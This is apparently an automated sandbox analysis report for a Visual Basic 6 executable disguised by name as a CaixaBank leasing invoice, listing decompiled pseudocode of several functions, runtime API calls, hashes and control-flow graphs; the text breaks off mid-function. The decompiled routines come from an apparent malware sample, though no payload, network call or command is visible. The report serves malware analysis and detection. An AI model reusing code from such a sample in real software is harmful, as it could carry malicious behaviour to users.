        • Associated: 00000000.00000002.1172990240.000000000040E000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1173000183.0000000000410000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 .jbxd
        Similarity
        • API ID: __vba$Free$#610CheckChkstkHresult$#662ListMoveNew2
        • String ID:
        • API String ID: 558009573-0
        • Opcode ID: 29bc2289398cf455b3e5fd9e96d76ab925c0eef2d75735e2a07a10b93455dcfd
        • Instruction ID: 47b86ae983b2ae163d9b2882beb79393a42830eac4e06dc30c76befd9b38fd92
        • Opcode Fuzzy Hash: 29bc2289398cf455b3e5fd9e96d76ab925c0eef2d75735e2a07a10b93455dcfd
        • Instruction Fuzzy Hash: 2D51C57190022CDFDB20EB95CC85FDEB7B9BB04704F1041AAE509B71A1DB786A89CF55
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        C-Code - Quality: 59%
        			E0040C518(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
        				intOrPtr _v8;
        				intOrPtr _v12;
        				intOrPtr _v16;
        				char _v28;
        				void* _v36;
        				signed int _v40;
        				intOrPtr _v48;
        				char _v56;
        				intOrPtr _v64;
        				intOrPtr _v72;
        				void* _v76;
        				signed int _v80;
        				signed int _v92;
        				intOrPtr* _v96;
        				signed int _v100;
        				signed int _t45;
        				char* _t49;
        				signed int _t56;
        				void* _t68;
        				void* _t70;
        				intOrPtr _t71;
        
        				_t71 = _t70 - 0xc;
        				 *[fs:0x0] = _t71;
        				L00401240();
        				_v16 = _t71;
        				_v12 = 0x401188;
        				_v8 = 0;
        				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x4c,  *[fs:0x0], 0x401246, _t68);
        				_v48 = 0x4b;
        				_v56 = 2;
        				_t45 =  &_v56;
        				_push(_t45);
        				L00401312();
        				L00401318();
        				_push(_t45);
        				_push(0x402d70);
        				L0040131E();
        				asm("sbb eax, eax");
        				_v76 =  ~( ~( ~_t45));
        				L00401342();
        				L00401372();
        				_t49 = _v76;
        				if(_t49 != 0) {
        					if( *0x40eb0c != 0) {
        						_v96 = 0x40eb0c;
        					} else {
        						_push(0x40eb0c);
        						_push(0x402d0c);
        						L00401360();
        						_v96 = 0x40eb0c;
        					}
        					_v76 =  *_v96;
        					_v64 = 0x47;
        					_v72 = 2;
        					L00401240();
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					_t56 =  *((intOrPtr*)( *_v76 + 0x34))(_v76, 0x10, 0x5e9,  &_v40);
        					asm("fclex");
        					_v80 = _t56;
        					if(_v80 >= 0) {
        						_v100 = _v100 & 0x00000000;
        					} else {
        						_push(0x34);
        						_push(0x402cfc);
        						_push(_v76);
        						_push(_v80);
        						L0040137E();
        						_v100 = _t56;
        					}
        					_v92 = _v40;
        					_v40 = _v40 & 0x00000000;
        					_push(_v92);
        					_t49 =  &_v28;
        					_push(_t49);
        					L00401366();
        				}
        				_push(0x40c674);
        				L00401378();
        				return _t49;
        			}
























        0x0040c51b
        0x0040c52a
        0x0040c534
        0x0040c53c
        0x0040c53f
        0x0040c546
        0x0040c555
        0x0040c558
        0x0040c55f
        0x0040c566
        0x0040c569
        0x0040c56a
        0x0040c574
        0x0040c579
        0x0040c57a
        0x0040c57f
        0x0040c586
        0x0040c58c
        0x0040c593
        0x0040c59b
        0x0040c5a0
        0x0040c5a6
        0x0040c5b3
        0x0040c5cd
        0x0040c5b5
        0x0040c5b5
        0x0040c5ba
        0x0040c5bf
        0x0040c5c4
        0x0040c5c4
        0x0040c5d9
        0x0040c5dc
        0x0040c5e3
        0x0040c5f6
        0x0040c600
        0x0040c601
        0x0040c602
        0x0040c603
        0x0040c60c
        0x0040c60f
        0x0040c611
        0x0040c618
        0x0040c631
        0x0040c61a
        0x0040c61a
        0x0040c61c
        0x0040c621
        0x0040c624
        0x0040c627
        0x0040c62c
        0x0040c62c
        0x0040c638
        0x0040c63b
        0x0040c63f
        0x0040c642
        0x0040c645
        0x0040c646
        0x0040c646
        0x0040c64b
        0x0040c66e
        0x0040c673

        APIs
        • __vbaChkstk.MSVBVM60(?,00401246), ref: 0040C534
        • #572.MSVBVM60(00000002), ref: 0040C56A
        • __vbaStrMove.MSVBVM60(00000002), ref: 0040C574
        • __vbaStrCmp.MSVBVM60(00402D70,00000000,00000002), ref: 0040C57F
        • __vbaFreeStr.MSVBVM60(00402D70,00000000,00000002), ref: 0040C593
        • __vbaFreeVar.MSVBVM60(00402D70,00000000,00000002), ref: 0040C59B
        • __vbaNew2.MSVBVM60(00402D0C,0040EB0C,00402D70,00000000,00000002), ref: 0040C5BF
        • __vbaChkstk.MSVBVM60(000005E9,?,?,?,?,?,?,?,?,00402D70,00000000,00000002), ref: 0040C5F6
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402CFC,00000034,?,?,?,?,?,?,?,00402D70,00000000,00000002), ref: 0040C627
        • __vbaObjSet.MSVBVM60(?,?,?,?,?,?,?,?,?,00402D70,00000000,00000002), ref: 0040C646
        • __vbaFreeObj.MSVBVM60(0040C674,00402D70,00000000,00000002), ref: 0040C66E
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1172948703.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1172930676.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1172990240.000000000040E000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1173000183.0000000000410000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 .jbxd
        Similarity
        • API ID: __vba$Free$Chkstk$#572CheckHresultMoveNew2
        • String ID: G$K
        • API String ID: 1892661122-2591177705
        • Opcode ID: 20e6e00cdce056991141a117918bf3a1135e85d2a7b01b3af6dae2f780cb7659
        • Instruction ID: d02560aacb57e23da4ba0f5cda4488dd49839382a566500998fbd178920c0049
        • Opcode Fuzzy Hash: 20e6e00cdce056991141a117918bf3a1135e85d2a7b01b3af6dae2f780cb7659
        • Instruction Fuzzy Hash: DA31FA70D40208EFDB10DFA5C98AB9EBBB5AF05704F10452AF501BB2E1D7796946CF58
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 371 40ce40-40ce99 __vbaChkstk __vbaCyStr __vbaFpCmpCy 373 40cff2-40d019 371->373 374 40ce9f-40ceba 371->374 377 40ced6 374->377 378 40cebc-40ced4 __vbaHresultCheckObj 374->378 379 40ceda-40cee1 377->379 378->379 380 40cee3-40cef9 __vbaNew2 379->380 381 40cefb 379->381 382 40cf02-40cf11 380->382 381->382 383 40cf13-40cf29 __vbaNew2 382->383 384 40cf2b 382->384 385 40cf32-40cf6d __vbaObjSet 383->385 384->385 388 40cf89 385->388 389 40cf6f-40cf87 __vbaHresultCheckObj 385->389 390 40cf8d-40cfbb __vbaObjSet 388->390 389->390 392 40cfd4 390->392 393 40cfbd-40cfd2 __vbaHresultCheckObj 390->393 394 40cfd8-40cfef __vbaFreeStr __vbaFreeObjList 392->394 393->394 394->373
        C-Code - Quality: 56%
        			E0040CE40(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
        				intOrPtr _v8;
        				intOrPtr _v12;
        				intOrPtr _v16;
        				char _v28;
        				signed int _v32;
        				char _v36;
        				char _v40;
        				signed int _v44;
        				intOrPtr* _v48;
        				signed int _v52;
        				intOrPtr* _v56;
        				signed int _v60;
        				signed int _v72;
        				signed int _v76;
        				intOrPtr* _v80;
        				intOrPtr* _v84;
        				signed int _v88;
        				signed int _v92;
        				char* _t64;
        				signed int _t68;
        				char* _t74;
        				signed int _t78;
        				char* _t80;
        				signed int _t83;
        				void* _t93;
        				void* _t95;
        				intOrPtr _t96;
        
        				_t96 = _t95 - 0xc;
        				 *[fs:0x0] = _t96;
        				L00401240();
        				_v16 = _t96;
        				_v12 = 0x401218;
        				_v8 = 0;
        				_t64 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x44,  *[fs:0x0], 0x401246, _t93);
        				_push(0x402d9c);
        				L004012DC();
        				_push(_t64);
        				L004012E2();
        				if(_t64 != 0) {
        					_t68 =  *((intOrPtr*)( *_a4 + 0x160))(_a4,  &_v32);
        					asm("fclex");
        					_v44 = _t68;
        					if(_v44 >= 0) {
        						_v76 = _v76 & 0x00000000;
        					} else {
        						_push(0x160);
        						_push(0x402aa8);
        						_push(_a4);
        						_push(_v44);
        						L0040137E();
        						_v76 = _t68;
        					}
        					if( *0x40eb0c != 0) {
        						_v80 = 0x40eb0c;
        					} else {
        						_push(0x40eb0c);
        						_push(0x402d0c);
        						L00401360();
        						_v80 = 0x40eb0c;
        					}
        					_v56 =  *_v80;
        					if( *0x40e010 != 0) {
        						_v84 = 0x40e010;
        					} else {
        						_push(0x40e010);
        						_push(0x401f6c);
        						L00401360();
        						_v84 = 0x40e010;
        					}
        					_t74 =  &_v36;
        					L00401366();
        					_v48 = _t74;
        					_t78 =  *((intOrPtr*)( *_v48 + 0x1c0))(_v48,  &_v28, _t74,  *((intOrPtr*)( *((intOrPtr*)( *_v84)) + 0x310))( *_v84));
        					asm("fclex");
        					_v52 = _t78;
        					if(_v52 >= 0) {
        						_v88 = _v88 & 0x00000000;
        					} else {
        						_push(0x1c0);
        						_push(0x402d3c);
        						_push(_v48);
        						_push(_v52);
        						L0040137E();
        						_v88 = _t78;
        					}
        					_v72 = _v32;
        					_v32 = _v32 & 0x00000000;
        					_t80 =  &_v40;
        					L00401366();
        					_t83 =  *((intOrPtr*)( *_v56 + 0x40))(_v56, _t80, _t80, _v72, _v28);
        					asm("fclex");
        					_v60 = _t83;
        					if(_v60 >= 0) {
        						_v92 = _v92 & 0x00000000;
        					} else {
        						_push(0x40);
        						_push(0x402cfc);
        						_push(_v56);
        						_push(_v60);
        						L0040137E();
        						_v92 = _t83;
        					}
        					L00401342();
        					_push( &_v40);
        					_t64 =  &_v36;
        					_push(_t64);
        					_push(2);
        					L00401348();
        				}
        				asm("wait");
        				_push(0x40d01a);
        				return _t64;
        			}






























        0x0040ce43
        0x0040ce52
        0x0040ce5c
        0x0040ce64
        0x0040ce67
        0x0040ce6e
        0x0040ce7d
        0x0040ce80
        0x0040ce85
        0x0040ce8b
        0x0040ce92
        0x0040ce99
        0x0040ceab
        0x0040ceb1
        0x0040ceb3
        0x0040ceba
        0x0040ced6
        0x0040cebc
        0x0040cebc
        0x0040cec1
        0x0040cec6
        0x0040cec9
        0x0040cecc
        0x0040ced1
        0x0040ced1
        0x0040cee1
        0x0040cefb
        0x0040cee3
        0x0040cee3
        0x0040cee8
        0x0040ceed
        0x0040cef2
        0x0040cef2
        0x0040cf07
        0x0040cf11
        0x0040cf2b
        0x0040cf13
        0x0040cf13
        0x0040cf18
        0x0040cf1d
        0x0040cf22
        0x0040cf22
        0x0040cf46
        0x0040cf4a
        0x0040cf4f
        0x0040cf5e
        0x0040cf64
        0x0040cf66
        0x0040cf6d
        0x0040cf89
        0x0040cf6f
        0x0040cf6f
        0x0040cf74
        0x0040cf79
        0x0040cf7c
        0x0040cf7f
        0x0040cf84
        0x0040cf84
        0x0040cf90
        0x0040cf93
        0x0040cf9d
        0x0040cfa1
        0x0040cfaf
        0x0040cfb2
        0x0040cfb4
        0x0040cfbb
        0x0040cfd4
        0x0040cfbd
        0x0040cfbd
        0x0040cfbf
        0x0040cfc4
        0x0040cfc7
        0x0040cfca
        0x0040cfcf
        0x0040cfcf
        0x0040cfdb
        0x0040cfe3
        0x0040cfe4
        0x0040cfe7
        0x0040cfe8
        0x0040cfea
        0x0040cfef
        0x0040cff2
        0x0040cff3
        0x00000000

        APIs
        • __vbaChkstk.MSVBVM60(?,00401246), ref: 0040CE5C
        • __vbaCyStr.MSVBVM60(00402D9C,?,?,?,?,00401246), ref: 0040CE85
        • __vbaFpCmpCy.MSVBVM60(00000000,?,00402D9C,?,?,?,?,00401246), ref: 0040CE92
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401218,00402AA8,00000160), ref: 0040CECC
        • __vbaNew2.MSVBVM60(00402D0C,0040EB0C), ref: 0040CEED
        • __vbaNew2.MSVBVM60(00401F6C,0040E010), ref: 0040CF1D
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040CF4A
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402D3C,000001C0), ref: 0040CF7F
        • __vbaObjSet.MSVBVM60(00402D9C,?,?), ref: 0040CFA1
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402CFC,00000040), ref: 0040CFCA
        • __vbaFreeStr.MSVBVM60(00000000,?,00402CFC,00000040), ref: 0040CFDB
        • __vbaFreeObjList.MSVBVM60(00000002,?,00402D9C), ref: 0040CFEA
        Memory Dump Source
        • Source File: 00000000.00000002.1172948703.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1172930676.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1172990240.000000000040E000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1173000183.0000000000410000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 .jbxd
        Similarity
        • API ID: __vba$CheckHresult$FreeNew2$ChkstkList
        • String ID:
        • API String ID: 3534970231-0
        • Opcode ID: d0faac37788fd3eecc0c17cdf37193894cfa7f8e853d99c7c3b0cd45ea335e2f
        • Instruction ID: ae64e92cb30e6d5b0897684d51ebc93e5b9debbea3c3fdb19b9f898f16f78ccd
        • Opcode Fuzzy Hash: d0faac37788fd3eecc0c17cdf37193894cfa7f8e853d99c7c3b0cd45ea335e2f
        • Instruction Fuzzy Hash: 4151E370940208EFDB10EFE5C989B9EBBB5BF08704F10457AF501BA2E0C7B9A9459B59
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 395 40c69d-40c701 __vbaChkstk #647 397 40c703-40c71c __vbaNew2 395->397 398 40c71e 395->398 399 40c728-40c766 __vbaObjSet 397->399 398->399 402 40c782 399->402 403 40c768-40c780 __vbaHresultCheckObj 399->403 404 40c789-40c7db __vbaVarTstEq __vbaFreeObj __vbaFreeVarList 402->404 403->404 405 40c7e1-40c7e8 404->405 406 40c875-40c8af __vbaFreeStr 404->406 408 40c805 405->408 409 40c7ea-40c803 __vbaNew2 405->409 410 40c80f-40c837 408->410 409->410 412 40c853 410->412 413 40c839-40c851 __vbaHresultCheckObj 410->413 414 40c85a-40c870 __vbaStrMove 412->414 413->414 414->406
        C-Code - Quality: 61%
        			E0040C69D(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
        				intOrPtr _v8;
        				intOrPtr _v12;
        				intOrPtr _v16;
        				void* _v32;
        				signed int _v36;
        				char _v40;
        				intOrPtr _v48;
        				char _v56;
        				char _v72;
        				intOrPtr _v80;
        				char _v88;
        				intOrPtr* _v124;
        				signed int _v128;
        				short _v132;
        				signed int _v144;
        				intOrPtr _v148;
        				intOrPtr* _v152;
        				signed int _v156;
        				intOrPtr* _v160;
        				signed int _v164;
        				char* _t76;
        				signed int _t80;
        				short _t84;
        				signed int _t88;
        				signed int _t94;
        				void* _t105;
        				void* _t107;
        				intOrPtr _t108;
        
        				_t108 = _t107 - 0xc;
        				 *[fs:0x0] = _t108;
        				L00401240();
        				_v16 = _t108;
        				_v12 = 0x401198;
        				_v8 = 0;
        				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401246, _t105);
        				_v48 = 0x80020004;
        				_v56 = 0xa;
        				_push( &_v56);
        				_push( &_v72);
        				L00401306();
        				if( *0x40e010 != 0) {
        					_v152 = 0x40e010;
        				} else {
        					_push(0x40e010);
        					_push(0x401f6c);
        					L00401360();
        					_v152 = 0x40e010;
        				}
        				_t76 =  &_v40;
        				L00401366();
        				_v124 = _t76;
        				_t80 =  *((intOrPtr*)( *_v124 + 0x48))(_v124,  &_v36, _t76,  *((intOrPtr*)( *((intOrPtr*)( *_v152)) + 0x314))( *_v152));
        				asm("fclex");
        				_v128 = _t80;
        				if(_v128 >= 0) {
        					_v156 = _v156 & 0x00000000;
        				} else {
        					_push(0x48);
        					_push(0x402d2c);
        					_push(_v124);
        					_push(_v128);
        					L0040137E();
        					_v156 = _t80;
        				}
        				_v144 = _v36;
        				_v36 = _v36 & 0x00000000;
        				_v80 = _v144;
        				_v88 = 0x8008;
        				_push( &_v72);
        				_t84 =  &_v88;
        				_push(_t84);
        				L0040130C();
        				_v132 = _t84;
        				L00401378();
        				_push( &_v88);
        				_push( &_v72);
        				_push( &_v56);
        				_push(3);
        				L00401354();
        				_t88 = _v132;
        				if(_t88 != 0) {
        					if( *0x40eb0c != 0) {
        						_v160 = 0x40eb0c;
        					} else {
        						_push(0x40eb0c);
        						_push(0x402d0c);
        						L00401360();
        						_v160 = 0x40eb0c;
        					}
        					_v124 =  *_v160;
        					_t94 =  *((intOrPtr*)( *_v124 + 0x48))(_v124, 0xae,  &_v36);
        					asm("fclex");
        					_v128 = _t94;
        					if(_v128 >= 0) {
        						_v164 = _v164 & 0x00000000;
        					} else {
        						_push(0x48);
        						_push(0x402cfc);
        						_push(_v124);
        						_push(_v128);
        						L0040137E();
        						_v164 = _t94;
        					}
        					_t88 = _v36;
        					_v148 = _t88;
        					_v36 = _v36 & 0x00000000;
        					L00401318();
        				}
        				_push(0x40c8b0);
        				L00401342();
        				return _t88;
        			}































        0x0040c6a0
        0x0040c6af
        0x0040c6bb
        0x0040c6c3
        0x0040c6c6
        0x0040c6cd
        0x0040c6dc
        0x0040c6df
        0x0040c6e6
        0x0040c6f0
        0x0040c6f4
        0x0040c6f5
        0x0040c701
        0x0040c71e
        0x0040c703
        0x0040c703
        0x0040c708
        0x0040c70d
        0x0040c712
        0x0040c712
        0x0040c742
        0x0040c746
        0x0040c74b
        0x0040c75a
        0x0040c75d
        0x0040c75f
        0x0040c766
        0x0040c782
        0x0040c768
        0x0040c768
        0x0040c76a
        0x0040c76f
        0x0040c772
        0x0040c775
        0x0040c77a
        0x0040c77a
        0x0040c78c
        0x0040c792
        0x0040c79c
        0x0040c79f
        0x0040c7a9
        0x0040c7aa
        0x0040c7ad
        0x0040c7ae
        0x0040c7b3
        0x0040c7ba
        0x0040c7c2
        0x0040c7c6
        0x0040c7ca
        0x0040c7cb
        0x0040c7cd
        0x0040c7d5
        0x0040c7db
        0x0040c7e8
        0x0040c805
        0x0040c7ea
        0x0040c7ea
        0x0040c7ef
        0x0040c7f4
        0x0040c7f9
        0x0040c7f9
        0x0040c817
        0x0040c82b
        0x0040c82e
        0x0040c830
        0x0040c837
        0x0040c853
        0x0040c839
        0x0040c839
        0x0040c83b
        0x0040c840
        0x0040c843
        0x0040c846
        0x0040c84b
        0x0040c84b
        0x0040c85a
        0x0040c85d
        0x0040c863
        0x0040c870
        0x0040c870
        0x0040c875
        0x0040c8aa
        0x0040c8af

        APIs
        • __vbaChkstk.MSVBVM60(?,00401246), ref: 0040C6BB
        • #647.MSVBVM60(?,0000000A), ref: 0040C6F5
        • __vbaNew2.MSVBVM60(00401F6C,0040E010,?,0000000A), ref: 0040C70D
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C746
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402D2C,00000048), ref: 0040C775
        • __vbaVarTstEq.MSVBVM60(00008008,?), ref: 0040C7AE
        • __vbaFreeObj.MSVBVM60(00008008,?), ref: 0040C7BA
        • __vbaFreeVarList.MSVBVM60(00000003,0000000A,?,00008008,00008008,?), ref: 0040C7CD
        • __vbaNew2.MSVBVM60(00402D0C,0040EB0C,?,?,?,00401246), ref: 0040C7F4
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402CFC,00000048), ref: 0040C846
        • __vbaStrMove.MSVBVM60(00000000,?,00402CFC,00000048), ref: 0040C870
        • __vbaFreeStr.MSVBVM60(0040C8B0,?,?,?,00401246), ref: 0040C8AA
        Memory Dump Source
        • Source File: 00000000.00000002.1172948703.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1172930676.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1172990240.000000000040E000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1173000183.0000000000410000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 .jbxd
        Similarity
        • API ID: __vba$Free$CheckHresultNew2$#647ChkstkListMove
        • String ID:
        • API String ID: 4111187846-0
        • Opcode ID: 941cf8d31551b3c1d8986d9e18cf4bc5c6181434a04d759cfcadb624e17b9209
        • Instruction ID: abb8e6ca172cff016a463259bb60d7cc10a684c0771768bbd385ae3b6c2b9c81
        • Opcode Fuzzy Hash: 941cf8d31551b3c1d8986d9e18cf4bc5c6181434a04d759cfcadb624e17b9209
        • Instruction Fuzzy Hash: B2512971D00218DFEB20EFA5C885BDDBBB4BF08304F2085AAE505B72A1D7795A45CF58
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 415 40cb62-40cc01 __vbaChkstk __vbaVarDup #607 __vbaVarTstNe __vbaFreeVarList 417 40ccc5-40ccec __vbaFreeVar 415->417 418 40cc07-40cc24 415->418 419 40cc26-40cc2c 418->419 420 40cc2e-40cc3a _adj_fdiv_m64 418->420 422 40cc3f-40cc9f __vbaFpI4 419->422 420->422 424 40cca1-40ccbc __vbaHresultCheckObj 422->424 425 40ccbe 422->425 424->417 425->417
        C-Code - Quality: 61%
        			E0040CB62(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
        				intOrPtr _v8;
        				intOrPtr _v12;
        				intOrPtr _v16;
        				char _v40;
        				intOrPtr _v52;
        				char _v60;
        				char _v76;
        				intOrPtr _v116;
        				char _v124;
        				signed int _v128;
        				char _v140;
        				signed int _v144;
        				signed int _t42;
        				signed int _t45;
        				char* _t49;
        				void* _t54;
        				void* _t56;
        				intOrPtr _t57;
        				intOrPtr* _t58;
        				signed long long _t64;
        
        				_t57 = _t56 - 0xc;
        				 *[fs:0x0] = _t57;
        				L00401240();
        				_v16 = _t57;
        				_v12 = 0x4011f8;
        				_v8 = 0;
        				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x78,  *[fs:0x0], 0x401246, _t54);
        				_t49 =  &_v40;
        				L00401300();
        				_v52 = 0x20;
        				_v60 = 2;
        				_push( &_v60);
        				_push(1);
        				_push( &_v76);
        				L004012E8();
        				_v116 = 0x402d84;
        				_v124 = 0x8008;
        				_push( &_v76);
        				_t42 =  &_v124;
        				_push(_t42);
        				L0040135A();
        				_v128 = _t42;
        				_push( &_v76);
        				_push( &_v60);
        				_push(2);
        				L00401354();
        				_t58 = _t57 + 0xc;
        				_t45 = _v128;
        				if(_t45 != 0) {
        					_push(_t49);
        					 *_t58 =  *0x4011f0;
        					_t64 =  *0x4011e8 *  *0x4011e0;
        					if( *0x40e000 != 0) {
        						_push( *0x4011dc);
        						_push( *0x4011d8);
        						L00401264();
        					} else {
        						_t64 = _t64 /  *0x4011d8;
        					}
        					_v140 = _t64;
        					_v76 = _v140;
        					 *_t58 =  *0x4011d0;
        					L0040132A();
        					 *_t58 =  *0x4011c0;
        					 *_t58 =  *0x4011bc;
        					 *_t58 =  *0x4011b8;
        					_t45 =  *((intOrPtr*)( *_a4 + 0x2c0))(_a4, 0x1c2, _t49, _t49, _t49, _t45, _t49, _t49);
        					asm("fclex");
        					_v128 = _t45;
        					if(_v128 >= 0) {
        						_v144 = _v144 & 0x00000000;
        					} else {
        						_push(0x2c0);
        						_push(0x402aa8);
        						_push(_a4);
        						_push(_v128);
        						L0040137E();
        						_v144 = _t45;
        					}
        				}
        				asm("wait");
        				_push(0x40cced);
        				L00401372();
        				return _t45;
        			}























        0x0040cb65
        0x0040cb74
        0x0040cb7e
        0x0040cb86
        0x0040cb89
        0x0040cb90
        0x0040cb9f
        0x0040cba5
        0x0040cba8
        0x0040cbad
        0x0040cbb4
        0x0040cbbe
        0x0040cbbf
        0x0040cbc4
        0x0040cbc5
        0x0040cbca
        0x0040cbd1
        0x0040cbdb
        0x0040cbdc
        0x0040cbdf
        0x0040cbe0
        0x0040cbe5
        0x0040cbec
        0x0040cbf0
        0x0040cbf1
        0x0040cbf3
        0x0040cbf8
        0x0040cbfb
        0x0040cc01
        0x0040cc0d
        0x0040cc0e
        0x0040cc17
        0x0040cc24
        0x0040cc2e
        0x0040cc34
        0x0040cc3a
        0x0040cc26
        0x0040cc26
        0x0040cc26
        0x0040cc3f
        0x0040cc4c
        0x0040cc56
        0x0040cc5f
        0x0040cc6c
        0x0040cc76
        0x0040cc80
        0x0040cc90
        0x0040cc96
        0x0040cc98
        0x0040cc9f
        0x0040ccbe
        0x0040cca1
        0x0040cca1
        0x0040cca6
        0x0040ccab
        0x0040ccae
        0x0040ccb1
        0x0040ccb6
        0x0040ccb6
        0x0040cc9f
        0x0040ccc5
        0x0040ccc6
        0x0040cce7
        0x0040ccec

        APIs
        • __vbaChkstk.MSVBVM60(?,00401246), ref: 0040CB7E
        • __vbaVarDup.MSVBVM60(?,?,?,?,00401246), ref: 0040CBA8
        • #607.MSVBVM60(?,00000001,00000002), ref: 0040CBC5
        • __vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CBE0
        • __vbaFreeVarList.MSVBVM60(00000002,00000002,?,00008008,?), ref: 0040CBF3
        • _adj_fdiv_m64.MSVBVM60(?,?,?,00401246), ref: 0040CC3A
        • __vbaFpI4.MSVBVM60(?,?,?,?,?,00401246), ref: 0040CC5F
        • __vbaHresultCheckObj.MSVBVM60(00000000,004011F8,00402AA8,000002C0), ref: 0040CCB1
        • __vbaFreeVar.MSVBVM60(0040CCED,?,?,00401246), ref: 0040CCE7
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1172948703.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1172930676.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1172990240.000000000040E000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1173000183.0000000000410000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 .jbxd
        Similarity
        • API ID: __vba$Free$#607CheckChkstkHresultList_adj_fdiv_m64
        • String ID:
        • API String ID: 2704755911-3916222277
        • Opcode ID: 3e07564da3c0811cabdf2f921b6ac07d6052e83982fe9815961268197faf8818
        • Instruction ID: fc9583d3be2f5b7dbc455ba2711a88e9c6a44cfb561fcf0c43d51bfac97a011e
        • Opcode Fuzzy Hash: 3e07564da3c0811cabdf2f921b6ac07d6052e83982fe9815961268197faf8818
        • Instruction Fuzzy Hash: 01413671900208EFEB14AFA1D989BADBBB8FB08704F00856EF545BB1A1CB785554DF58
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 426 40cd14-40cd48 __vbaChkstk 427 40cd62 426->427 428 40cd4a-40cd60 __vbaNew2 426->428 429 40cd69-40cd89 427->429 428->429 431 40cda2 429->431 432 40cd8b-40cda0 __vbaHresultCheckObj 429->432 433 40cda6-40cdc4 431->433 432->433 435 40cdc6-40cddb __vbaHresultCheckObj 433->435 436 40cddd 433->436 437 40cde1-40ce1e __vbaStrMove __vbaFreeObj __vbaFreeStr 435->437 436->437
        C-Code - Quality: 55%
        			E0040CD14(void* __ebx, void* __ecx, void* __edi, void* __esi) {
        				intOrPtr _v8;
        				intOrPtr _v12;
        				void* _v24;
        				signed int _v36;
        				void* _v40;
        				intOrPtr* _v44;
        				signed int _v48;
        				intOrPtr* _v52;
        				signed int _v56;
        				intOrPtr _v64;
        				intOrPtr* _v68;
        				signed int _v72;
        				signed int _v76;
        				signed int _t46;
        				signed int _t51;
        				signed int _t52;
        				intOrPtr _t63;
        
        				_push(0x401246);
        				_push( *[fs:0x0]);
        				 *[fs:0x0] = _t63;
        				_push(0x38);
        				L00401240();
        				_v12 = _t63;
        				_v8 = 0x401208;
        				if( *0x40eb0c != 0) {
        					_v68 = 0x40eb0c;
        				} else {
        					_push(0x40eb0c);
        					_push(0x402d0c);
        					L00401360();
        					_v68 = 0x40eb0c;
        				}
        				_v44 =  *_v68;
        				_t46 =  *((intOrPtr*)( *_v44 + 0x14))(_v44,  &_v40);
        				asm("fclex");
        				_v48 = _t46;
        				if(_v48 >= 0) {
        					_v72 = _v72 & 0x00000000;
        				} else {
        					_push(0x14);
        					_push(0x402cfc);
        					_push(_v44);
        					_push(_v48);
        					L0040137E();
        					_v72 = _t46;
        				}
        				_v52 = _v40;
        				_t51 =  *((intOrPtr*)( *_v52 + 0x58))(_v52,  &_v36);
        				asm("fclex");
        				_v56 = _t51;
        				if(_v56 >= 0) {
        					_v76 = _v76 & 0x00000000;
        				} else {
        					_push(0x58);
        					_push(0x402d88);
        					_push(_v52);
        					_push(_v56);
        					L0040137E();
        					_v76 = _t51;
        				}
        				_t52 = _v36;
        				_v64 = _t52;
